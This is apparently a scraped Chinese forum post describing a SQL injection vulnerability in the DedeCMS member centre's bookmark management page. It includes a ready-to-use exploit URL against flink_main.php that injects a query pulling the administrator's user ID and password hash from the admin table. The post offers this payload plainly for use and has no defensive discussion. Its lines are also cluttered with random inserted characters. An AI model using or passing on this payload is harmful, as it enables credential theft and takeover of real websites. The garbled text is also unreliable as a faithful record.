DedeCMS会员中心SQL注射漏洞: Y! X5 }1 E; Y% Z
需要magic_quotes_gpc = Off
7 O# m2 y+ u) k% ~: g会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.
8 N( H: g) d+ Q / c* j& z, A' j' x
DedeCMS会员中心书签管理SQL注射漏洞
/ c! O. W D; k/ S成功利用该漏洞可获得管理员密码+ k2 P; ?6 u) r ^2 u( I' V& T
R4 e% Y& N8 Q1 x
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码
# ?0 ^! s. k" b% o! L: P
/ V8 x g" t) C/ O3 K- Qhttp://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r
+ U$ i3 Q# H+ x |
发表于 2012-12-31 09:21:18
收藏
支持
反对
发表于 2013-1-10 01:33:59